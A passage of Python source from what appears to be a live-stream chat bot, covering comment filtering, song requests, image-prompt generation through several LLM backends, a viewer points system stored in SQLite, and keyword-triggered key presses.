\n resp_content = My_handle.audio.search_files(self.choose_song_config['song_path'], song_filename)\n if resp_content == []:\n return True\n \n logging.debug(f\"匹配到的音频原相对路径:{resp_content[0]}\")\n\n # 拼接音频文件路径\n resp_content = f\"{self.choose_song_config['song_path']}/{resp_content[0]}\"\n logging.info(f\"匹配到的音频路径:{resp_content}\")\n message = {\n \"type\": \"song\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n # 判断取消点歌命令是否正确\n elif content.startswith(self.choose_song_config[\"stop_cmd\"]):\n My_handle.audio.stop_current_audio()\n\n return True\n # 判断随机点歌命令是否正确\n elif content == self.choose_song_config[\"random_cmd\"]:\n resp_content = My_handle.common.random_search_a_audio_file(self.choose_song_config['song_path'])\n if resp_content is None:\n return True\n \n logging.info(f\"随机到的音频路径:{resp_content}\")\n\n message = {\n \"type\": \"song\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n\n\n return False\n\n\n # 画图模式 SD 处理\n def sd_handle(self, data):\n \"\"\"画图模式 SD 处理\n\n Args:\n data (dict): 用户名 弹幕数据\n\n Returns:\n bool: 是否触发并处理\n \"\"\"\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n if content.startswith(self.sd_config[\"trigger\"]):\n # 含有违禁词/链接\n if My_handle.common.profanity_content(content) or My_handle.common.check_sensitive_words2(\n self.filter_config[\"badwords_path\"], content) or \\\n My_handle.common.is_url_check(content):\n logging.warning(f\"违禁词/链接:{content}\")\n return\n \n if self.sd_config[\"enable\"] == False:\n logging.info(\"您还未启用SD模式,无法使用画画功能\")\n return True\n else:\n # 输出当前用户发送的弹幕消息\n logging.info(f\"[{user_name}]: {content}\")\n\n content = content[len(self.sd_config[\"trigger\"]):]\n\n # 根据设定的LLM\n if self.sd_config[\"prompt_llm\"][\"type\"] == \"chatgpt\":\n if self.chatgpt is None:\n self.chatgpt = GPT_MODEL.get(\"chatgpt\")\n\n content = self.sd_config[\"prompt_llm\"][\"before_prompt\"] + \\\n content + self.after_prompt\n # 调用gpt接口,获取返回内容\n resp_content = self.chatgpt.get_gpt_resp(user_name, content)\n if resp_content is not None:\n # 输出 ChatGPT 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatgpt无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"claude\":\n if self.claude is None:\n self.claude = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if not self.claude.reset_claude():\n logging.error(\"重置Claude会话失败喵~\")\n \n content = self.before_prompt + content + self.after_prompt\n resp_content = self.claude.get_claude_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"claude2\":\n if self.claude2 is None:\n self.claude2 = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if self.claude2.get_organization_id() is None:\n logging.error(\"重置Claude2会话失败喵~\")\n \n content = self.before_prompt + content + self.after_prompt\n resp_content = self.claude2.get_claude2_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude2无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"chatglm\":\n if self.chatglm is None:\n self.chatglm = GPT_MODEL.get(self.chat_type)\n\n # 生成回复\n resp_content = self.chatglm.get_chatglm_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatglm无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"text_generation_webui\":\n if self.text_generation_webui is None:\n self.text_generation_webui = GPT_MODEL.get(self.chat_type)\n\n # 生成回复\n resp_content = self.text_generation_webui.get_text_generation_webui_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:text_generation_webui无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"none\":\n resp_content = content\n else:\n resp_content = content\n\n self.sd.process_input(resp_content)\n return True\n \n return False\n\n\n # 弹幕格式检查和特殊字符替换\n def comment_check_and_replace(self, content):\n \"\"\"弹幕格式检查和特殊字符替换\n\n Args:\n content (str): 待处理的弹幕内容\n\n Returns:\n str: 处理完毕后的弹幕内容/None\n \"\"\"\n # 判断弹幕是否以xx起始,如果不是则返回\n if self.filter_config[\"before_must_str\"] and not any(\n content.startswith(prefix) for prefix in self.filter_config[\"before_must_str\"]):\n return None\n else:\n for prefix in self.filter_config[\"before_must_str\"]:\n if content.startswith(prefix):\n content = content[len(prefix):] # 删除匹配的开头\n break\n\n # 判断弹幕是否以xx结尾,如果不是则返回\n if self.filter_config[\"after_must_str\"] and not any(\n content.endswith(prefix) for prefix in self.filter_config[\"after_must_str\"]):\n return None\n else:\n for prefix in self.filter_config[\"after_must_str\"]:\n if content.endswith(prefix):\n content = content[:-len(prefix)] # 删除匹配的结尾\n break\n\n # 全为标点符号\n if My_handle.common.is_punctuation_string(content):\n return None\n\n # 换行转为,\n content = content.replace('\\n', ',')\n\n # 语言检测\n if My_handle.common.lang_check(content, self.need_lang) is None:\n logging.warning(\"语言检测不通过,已过滤\")\n return None\n\n return content\n\n\n # 违禁处理\n def prohibitions_handle(self, content):\n \"\"\"违禁处理\n\n Args:\n content (str): 带判断的字符串内容\n\n Returns:\n bool: 是否违禁词 是True 否False\n \"\"\"\n # 含有违禁词/链接\n if My_handle.common.profanity_content(content) or My_handle.common.is_url_check(content):\n logging.warning(f\"违禁词/链接:{content}\")\n return True\n\n # 违禁词过滤\n if self.filter_config[\"badwords_path\"] != \"\":\n if My_handle.common.check_sensitive_words2(self.filter_config[\"badwords_path\"], content):\n logging.warning(f\"本地违禁词:{content}\")\n return True\n\n # 同拼音违禁词过滤\n if self.filter_config[\"bad_pinyin_path\"] != \"\":\n if My_handle.common.check_sensitive_words3(self.filter_config[\"bad_pinyin_path\"], content):\n logging.warning(f\"同音违禁词:{content}\")\n return True\n \n return False\n\n\n # 直接复读\n def reread_handle(self, data):\n \"\"\"复读处理\n\n Args:\n data (dict): 包含用户名,弹幕内容\n\n Returns:\n _type_: 寂寞\n \"\"\"\n\n user_name = data[\"user_name\"]\n content = data[\"content\"]\n\n logging.info(f\"复读内容:{content}\")\n \n # 音频合成时需要用到的重要数据\n message = {\n \"type\": \"reread\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": content\n }\n\n My_handle.audio.audio_synthesis(message)\n\n\n # LLM处理\n def llm_handle(self, chat_type, data):\n \"\"\"LLM统一处理\n\n Args:\n chat_type (str): 聊天类型\n data (str): dict,含用户名和内容\n\n Returns:\n str: LLM返回的结果\n \"\"\"\n resp_content = None\n\n if chat_type == \"chatgpt\":\n # 调用gpt接口,获取返回内容\n resp_content = self.chatgpt.get_gpt_resp(data[\"user_name\"], data[\"content\"])\n elif chat_type == \"claude\":\n resp_content = self.claude.get_claude_resp(data[\"content\"])\n elif chat_type == \"claude2\":\n resp_content = self.claude2.get_claude2_resp(data[\"content\"])\n elif chat_type == \"chatterbot\":\n # 生成回复\n resp_content = self.bot.get_response(data[\"content\"]).text\n elif chat_type == \"chatglm\":\n resp_content = self.chatglm.get_chatglm_resp(data[\"content\"])\n elif chat_type == \"chat_with_file\":\n resp_content = self.chat_with_file.get_model_resp(data[\"content\"])\n elif chat_type == \"text_generation_webui\":\n # 生成回复\n resp_content = self.text_generation_webui.get_text_generation_webui_resp(data[\"content\"])\n elif chat_type == \"sparkdesk\":\n # 生成回复\n resp_content = self.sparkdesk.get_sparkdesk_resp(data[\"content\"])\n elif chat_type == \"langchain_chatglm\":\n # 生成回复\n resp_content = self.langchain_chatglm.get_resp(data[\"content\"])\n elif chat_type == \"zhipu\":\n # 生成回复\n resp_content = self.zhipu.get_resp(data[\"content\"])\n elif chat_type == \"bard\":\n # 生成回复\n resp_content = self.bard_api.get_resp(data[\"content\"])\n elif chat_type == \"yiyan\":\n # 生成回复\n resp_content = self.yiyan.get_resp(data[\"content\"])\n elif chat_type == \"tongyi\":\n # 生成回复\n resp_content = self.tongyi.get_resp(data[\"content\"])\n elif chat_type == \"reread\":\n # 复读机\n resp_content = data[\"content\"]\n elif chat_type == \"none\":\n # 不启用\n pass\n else:\n resp_content = data[\"content\"]\n\n return resp_content\n\n\n # 积分处理\n def integral_handle(self, type, data):\n \"\"\"积分处理\n\n Args:\n type (str): 消息数据类型(comment/gift/entrance)\n data (dict): 平台侧传入的data数据,直接拿来做解析\n\n Returns:\n bool: 是否正常触发了积分事件,是True 否False\n \"\"\"\n user_name = data[\"username\"]\n \n if My_handle.config.get(\"integral\", \"enable\"):\n # 根据消息类型进行对应处理\n if \"comment\" == type:\n content = data[\"content\"]\n\n # 是否开启了签到功能\n if My_handle.config.get(\"integral\", \"sign\", \"enable\"):\n # 判断弹幕内容是否是命令\n if content in My_handle.config.get(\"integral\", \"sign\", \"cmd\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n # 获取文案并合成语音,传入签到天数自动检索\n def get_copywriting_and_audio_synthesis(sign_num):\n # 判断当前签到天数在哪个签到数区间内,根据不同的区间提供不同的文案回复\n for integral_sign_copywriting in My_handle.config.get(\"integral\", \"sign\", \"copywriting\"):\n # 在此区间范围内,所以你的配置一定要对,不然这里就崩溃了!!!\n if int(integral_sign_copywriting[\"sign_num_interval\"].split(\"-\")[0]) <= \\\n sign_num <= \\\n int(integral_sign_copywriting[\"sign_num_interval\"].split(\"-\")[1]):\n # 匹配文案\n resp_content = random.choice(integral_sign_copywriting[\"copywriting\"])\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"get_integral\": int(My_handle.config.get(\"integral\", \"sign\", \"get_integral\")),\n \"sign_num\": sign_num + 1\n } \n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n if integral_data == []:\n # 积分表中没有该用户,插入数据\n insert_data_sql = '''\n INSERT INTO integral (platform, username, uid, integral, view_num, sign_num, last_sign_ts, total_price, last_ts) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data[\"platform\"], \n user_name, \n user_name, \n My_handle.config.get(\"integral\", \"sign\", \"get_integral\"), \n 1,\n 1,\n datetime.now(),\n 0,\n datetime.now())\n )\n\n logging.info(f\"integral积分表 新增 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(0)\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户,更新数据\n\n # 先判断last_sign_ts是否是今天,如果是,则说明已经打卡过了,不能重复打卡\n # 获取日期时间字符串字段,此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n date_string = integral_data[6]\n\n # 获取日期部分(前10个字符),并与当前日期字符串比较\n if date_string[:10] == datetime.now().date().strftime(\"%Y-%m-%d\"):\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": f\"{user_name}您今天已经签到过了,不能重复打卡哦~\"\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n\n # 更新下用户数据\n update_data_sql = '''\n UPDATE integral SET integral=?, view_num=?, sign_num=?, last_sign_ts=?, last_ts=? WHERE username =?\n '''\n self.db.execute(update_data_sql, (\n # 此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n integral_data[3] + My_handle.config.get(\"integral\", \"sign\", \"get_integral\"), \n integral_data[4] + 1,\n integral_data[5] + 1,\n datetime.now(),\n datetime.now(),\n user_name\n )\n )\n\n logging.info(f\"integral积分表 更新 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(integral_data[5] + 1)\n\n return True\n elif \"gift\" == type:\n # 是否开启了礼物功能\n if My_handle.config.get(\"integral\", \"gift\", \"enable\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n get_integral = int(float(My_handle.config.get(\"integral\", \"gift\", \"get_integral_proportion\")) * data[\"total_price\"])\n\n # 获取文案并合成语音,传入总礼物金额自动检索\n def get_copywriting_and_audio_synthesis(total_price):\n # 判断当前礼物金额在哪个礼物金额区间内,根据不同的区间提供不同的文案回复\n for integral_gift_copywriting in My_handle.config.get(\"integral\", \"gift\", \"copywriting\"):\n # 在此区间范围内,所以你的配置一定要对,不然这里就崩溃了!!!\n if float(integral_gift_copywriting[\"gift_price_interval\"].split(\"-\")[0]) <= \\\n total_price <= \\\n float(integral_gift_copywriting[\"gift_price_interval\"].split(\"-\")[1]):\n # 匹配文案\n resp_content = random.choice(integral_gift_copywriting[\"copywriting\"])\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"gift_name\": data[\"gift_name\"],\n \"get_integral\": get_integral\n } \n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n # TODO:此处有计算bug!!! 总礼物价值计算不对,后期待优化\n if integral_data == []:\n # 积分表中没有该用户,插入数据\n insert_data_sql = '''\n INSERT INTO integral (platform, username, uid, integral, view_num, sign_num, last_sign_ts, total_price, last_ts) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data[\"platform\"], \n user_name, \n user_name, \n get_integral, \n 1,\n 1,\n datetime.now(),\n data[\"total_price\"],\n datetime.now())\n )\n\n logging.info(f\"integral积分表 新增 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(data[\"total_price\"])\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户,更新数据\n\n # 更新下用户数据\n update_data_sql = '''\n UPDATE integral SET integral=?, total_price=?, last_ts=? WHERE username =?\n '''\n self.db.execute(update_data_sql, (\n # 此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n integral_data[3] + get_integral, \n integral_data[7] + data[\"total_price\"],\n datetime.now(),\n user_name\n )\n )\n\n logging.info(f\"integral积分表 更新 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(data[\"total_price\"])\n\n return True\n elif \"entrance\" == type:\n # 是否开启了入场功能\n if My_handle.config.get(\"integral\", \"entrance\", \"enable\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n # 获取文案并合成语音,传入观看天数自动检索\n def get_copywriting_and_audio_synthesis(view_num):\n # 判断当前签到天数在哪个签到数区间内,根据不同的区间提供不同的文案回复\n for integral_entrance_copywriting in My_handle.config.get(\"integral\", \"entrance\", \"copywriting\"):\n # 在此区间范围内,所以你的配置一定要对,不然这里就崩溃了!!!\n if int(integral_entrance_copywriting[\"entrance_num_interval\"].split(\"-\")[0]) <= \\\n view_num <= \\\n int(integral_entrance_copywriting[\"entrance_num_interval\"].split(\"-\")[1]):\n # 匹配文案\n resp_content = random.choice(integral_entrance_copywriting[\"copywriting\"])\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"get_integral\": int(My_handle.config.get(\"integral\", \"entrance\", \"get_integral\")),\n \"entrance_num\": view_num + 1\n } \n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n if integral_data == []:\n # 积分表中没有该用户,插入数据\n insert_data_sql = '''\n INSERT INTO integral (platform, username, uid, integral, view_num, sign_num, last_sign_ts, total_price, last_ts) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data[\"platform\"], \n user_name, \n user_name, \n My_handle.config.get(\"integral\", \"entrance\", \"get_integral\"), \n 1,\n 0,\n datetime.now(),\n 0,\n datetime.now())\n )\n\n logging.info(f\"integral积分表 新增 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(1)\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户,更新数据\n\n # 先判断last_ts是否是今天,如果是,则说明已经观看过了,不能重复记录\n # 获取日期时间字符串字段,此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n date_string = integral_data[8]\n\n # 获取日期部分(前10个字符),并与当前日期字符串比较\n if date_string[:10] == datetime.now().date().strftime(\"%Y-%m-%d\"):\n return False\n\n # 更新下用户数据\n update_data_sql = '''\n UPDATE integral SET integral=?, view_num=?, last_ts=? WHERE username =?\n '''\n self.db.execute(update_data_sql, (\n # 此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n integral_data[3] + My_handle.config.get(\"integral\", \"entrance\", \"get_integral\"), \n integral_data[4] + 1,\n datetime.now(),\n user_name\n )\n )\n\n logging.info(f\"integral积分表 更新 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(integral_data[4] + 1)\n\n return True\n elif \"crud\" == type:\n content = data[\"content\"]\n \n # 是否开启了查询功能\n if My_handle.config.get(\"integral\", \"crud\", \"query\", \"enable\"):\n # 判断弹幕内容是否是命令\n if content in My_handle.config.get(\"integral\", \"crud\", \"query\", \"cmd\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n # 获取文案并合成语音,传入积分总数自动检索\n def get_copywriting_and_audio_synthesis(total_integral):\n # 匹配文案\n resp_content = random.choice(My_handle.config.get(\"integral\", \"crud\", \"query\", \"copywriting\"))\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"integral\": total_integral\n }\n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n\n # 如果积分为0,则返回个没积分的回复。不过���个基本没可能,除非有bug\n if total_integral == 0:\n resp_content = data[\"username\"] + \",查询到您无积分。\"\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n if integral_data == []:\n logging.info(f\"integral积分表 查询不到 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(0)\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户\n\n # 获取日期时间字符串字段,此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n date_string = integral_data[3]\n\n logging.info(f\"integral积分表 用户:{user_name},总积分:{date_string}\")\n\n get_copywriting_and_audio_synthesis(int(date_string))\n\n return True\n return False\n\n\n # 按键映射处理\n def key_mapping_handle(self, data):\n \"\"\"按键映射处理\n\n Args:\n data (dict): 平台侧传入的data数据,直接拿来做解析\n\n Returns:\n bool: 是否正常触发了按键映射事件,是True 否False\n \"\"\"\n # 官方文档:https://pyautogui.readthedocs.io/en/latest/keyboard.html#keyboard-keys\n if My_handle.config.get(\"key_mapping\", \"enable\"):\n content = data[\"content\"]\n # 判断命令头是否匹配\n start_cmd = My_handle.config.get(\"key_mapping\", \"start_cmd\")\n if start_cmd != \"\" and content.startswith(start_cmd):\n # 删除命令头部\n content = content[len(start_cmd):]\n\n key_mapping_configs = My_handle.config.get(\"key_mapping\", \"config\")\n\n for key_mapping_config in key_mapping_configs:\n similarity = float(key_mapping_config[\"similarity\"])\n for keyword in key_mapping_config[\"keywords\"]:\n # 判断相似度\n ratio = difflib.SequenceMatcher(None, content, keyword).ratio()\n if ratio >= similarity:\n # 触发对应按键按下释放\n for key in key_mapping_config[\"keys\"]:\n pyautogui.keyDown(key)\n for key in key_mapping_config[\"keys\"]:\n pyautogui.keyUp(key)\n\n logging.info(f'【触发按键映射】关键词:{keyword} 按键:{key_mapping_config[\"keys\"]}')\n\n return True\n \n return False\n\n\n # 弹幕处理\n def comment_handle(self, data):\n \"\"\"弹幕处理\n\n Args:\n data (dict): 包含用户名,弹幕内容\n\n Returns:\n _type_: 寂寞\n \"\"\"\n\n try:\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 记录数据库\n if My_handle.config.get(\"database\", \"comment_enable\"):\n insert_data_sql = '''\n INSERT INTO danmu (username, content, ts) VALUES (?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (user_name, content, datetime.now()))\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n # 0、积分机制运转\n if self.integral_handle(\"comment\", data):\n return\n if self.integral_handle(\"crud\", data):\n return\n\n # 输出当前用户发送的弹幕消息\n logging.info(f\"[{user_name}]: {content}\")\n\n \"\"\"\n 用户名也得过滤一下,防止炸弹人\n \"\"\"\n # 用户名以及弹幕违禁判断\n if self.prohibitions_handle(user_name) or self.prohibitions_handle(content):\n return\n \n # 弹幕格式检查和特殊字符替换\n content = self.comment_check_and_replace(content)\n if content is None:\n return\n \n # 判断字符串是否全为标点符号,是的话就过滤\n if My_handle.common.is_punctuation_string(content):\n logging.debug(f\"用户:{user_name}],发送纯符号的弹幕,已过滤\")\n return\n \n # 按键映射 触发后不执行后面的其他功能\n if self.key_mapping_handle(data):\n return\n \n try:\n # 念弹幕\n if My_handle.config.get(\"read_comment\", \"enable\"):\n # 音频合成时需要用到的重要数据\n message = {\n \"type\": \"read_comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": content\n }\n\n # 判断是否需要念用户名\n if My_handle.config.get(\"read_comment\", \"read_username_enable\"):\n # 将用户名中特殊字符替换为空\n message['user_name'] = self.common.replace_special_characters(message['user_name'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\")\n tmp_content = random.choice(self.config.get(\"read_comment\", \"read_username_copywriting\"))\n if \"{username}\" in tmp_content:\n message['content'] = tmp_content.format(username=message['user_name']) + message['content']\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n # 1、本地问答库 处理\n if self.local_qa_handle(data):\n return\n\n # 2、点歌模式 触发后不执行后面的其他功能\n if self.choose_song_handle(data):\n return\n\n # 3、画图模式 触发后不执行后面的其他功能\n if self.sd_handle(data):\n return\n \n data_json = {\n \"user_name\": user_name,\n \"content\": content\n }\n\n \"\"\"\n 根据聊天类型执行不同逻辑\n \"\"\" \n if self.chat_type == \"chatgpt\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 ChatGPT 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatgpt无返回\")\n elif self.chat_type == \"claude\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude无返回\")\n elif self.chat_type == \"claude2\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude2无返回\")\n elif self.chat_type == \"chatterbot\":\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n elif self.chat_type == \"chatglm\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatglm无返回\")\n elif self.chat_type == \"chat_with_file\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n print(f\"[AI回复{user_name}]:{resp_content}\")\n elif self.chat_type == \"text_generation_webui\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:text_generation_webui无返回\")\n elif self.chat_type == \"sparkdesk\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:讯飞星火无返回\")\n elif self.chat_type == \"langchain_chatglm\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:langchain_chatglm无返回\")\n elif self.chat_type == \"zhipu\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:智谱AI无返回\")\n elif self.chat_type == \"bard\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:Bard无返回,请检查配置、网络是否正确,也可能是token过期,需要清空cookie重新登录获取\")\n elif self.chat_type == \"yiyan\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:文心一言无返回,请检查配置、网络是否正确,也可能是cookie过期或失效,需要重新获取cookie\")\n elif self.chat_type == \"tongyi\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n 